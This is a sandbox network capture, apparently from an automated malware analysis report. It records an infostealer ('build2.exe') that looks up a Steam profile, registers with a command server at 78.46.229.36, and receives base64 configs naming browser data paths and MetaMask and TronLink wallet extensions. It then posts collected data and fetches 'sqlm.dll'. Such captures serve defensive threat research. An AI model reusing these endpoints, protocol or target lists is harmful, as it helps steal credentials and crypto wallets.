                                                                                                                                                                                                                                      16192.168.2.649736162.159.129.2334434004C:\Windows\explorer.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:31 UTC314OUTGET /attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe?ex=660740c1&is=65f4cbc1&hm=fd820d24e53345690281599b22ef3adb9ee8518e9dbf6fb23e9b0949a35af707& HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                                                                      2024-03-28 16:51:31 UTC1358INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:31 GMT
                                                                                                                                                                                                                                      Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                                                                                      Content-Length: 235
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      CF-Ray: 86b92018ade12099-IAD
                                                                                                                                                                                                                                      CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                      Content-Disposition: attachment
                                                                                                                                                                                                                                      Expires: Fri, 28 Mar 2025 16:51:31 GMT
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      x-guploader-uploadid: ABPtcPo3f-t4OqZUlu8FHazd44yaLA1o9wXw6zs9SGp0miVAry0RuU9Rm2eTFlvDGAFdzgep9jfRJAE5HQ
                                                                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                                                      Set-Cookie: __cf_bm=GuqLQwTbDEsJ74Kqqr9XrNs0IzF1P7Oi4yY5Dgquclo-1711644691-1.0.1.1-UYDHBONP..JMKy.YZo_AuDEXN0vfKEyN3WY8WzTHGb4lSIwFSUdRKe6wiMciG.9tlWZnFPfRV0acUDYf1HIXvA; path=/; expires=Thu, 28-Mar-24 17:21:31 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DP75H5rgiATZrlkDmYbjwS5kqCgBOu65gNeYcIRphlWh53z0OCzaS0av9Av08WVbMrm7snO3c6prX7PqjYgUVpXkKZWhpX%2B3QNIBSvgXhPRffXPzt6VDWsmURGm0jBKSiZr%2FIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Set-Cookie: _cfuvid=rEeEjDGTiGP2KazGOQqzDfjp3ZL6UsTD6OT1PnC0qDM-1711644691388-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      2024-03-28 16:51:31 UTC11INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69
                                                                                                                                                                                                                                      Data Ascii: <?xml versi
                                                                                                                                                                                                                                      2024-03-28 16:51:31 UTC224INData Raw: 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 30 37 39 37 35 32 36 38 37 32 37 38 36 32 38 39 36 36 2f 31 32 31 38 33 32 35 31 39 34 37 32 35 32 36 35 34 32 38 2f 46 75 70 79 69 76 72 75 6b 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                                                                                                                                                      Data Ascii: on='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1079752687278628966/1218325194725265428/Fupyivruk.exe</Details></Error>


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.649738104.105.90.131443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:38 UTC119OUTGET /profiles/76561199658817715 HTTP/1.1
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:38 UTC1882INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:38 GMT
                                                                                                                                                                                                                                      Content-Length: 34657
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=56712d85c55d1df741779468; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C4501bef07644d0152615a97beef5c423; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                      2024-03-28 16:51:38 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                                                                      2024-03-28 16:51:38 UTC10074INData Raw: 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 69 6e 73 74 61 6c 6c 73 74 65 61 6d 5f 62 74 6e 20 68 65 61 64 65 72 5f 69 6e 73 74 61
                                                                                                                                                                                                                                      Data Ascii: '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Menu"><a class="header_installsteam_btn header_insta
                                                                                                                                                                                                                                      2024-03-28 16:51:38 UTC10081INData Raw: 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 70 75 62 6c 69 63 5c 2f 73 68 61 72 65 64 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 48 41 54 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71
                                                                                                                                                                                                                                      Data Ascii: :\/\/store.cloudflare.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_URL&quot;:&quot;https:\/\/community.cloudflare.steamstatic.com\/public\/shared\/&quot;,&quot;COMMUNITY_BASE_URL&quot;:&quot;https:\/\/steamcommunity.com\/&quot;,&quot;CHAT_BASE_URL&quot;:&q


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.64974178.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:39 UTC218OUTGET / HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.64974378.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:40 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJK
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 279
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:40 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 39 38 44 41 42 34 38 43 36 42 31 31 35 35 35 30 32 31 34 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 47 43 47 48 43 47 48 43 41 4b 45 43 42 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                                                                      Data Ascii: ------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="hwid"A198DAB48C6B1155502147-a33c7340-61ca-11ee-8c18-806e6f6e6963------DAECGCGHCGHCAKECBKJKContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------
                                                                                                                                                                                                                                      2024-03-28 16:51:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:41 UTC67INData Raw: 33 38 0d 0a 31 7c 31 7c 31 7c 31 7c 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 381|1|1|1|5d3c0248c1d1316646dffa0a7ab5a097|1|1|1|0|0|500000


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.64974578.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:41 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJDGHCBGDHIECBGIDAE
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------HJJDGHCBGDHIECBGIDAEContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------HJJDGHCBGDHIECBGIDAECont
                                                                                                                                                                                                                                      2024-03-28 16:51:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:42 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.64974678.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:42 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGH
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------BGHIIJDGHCBFIECBKEGHCont
                                                                                                                                                                                                                                      2024-03-28 16:51:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:43 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                      Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      22192.168.2.64974878.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:44 UTC311OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 7985
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:51:44 UTC7985OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------HJJJJKEHCAKFBFHJKEHCCont
                                                                                                                                                                                                                                      2024-03-28 16:51:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:51:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:51:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      23192.168.2.64975078.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:51:46 UTC226OUTGET /sqlm.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
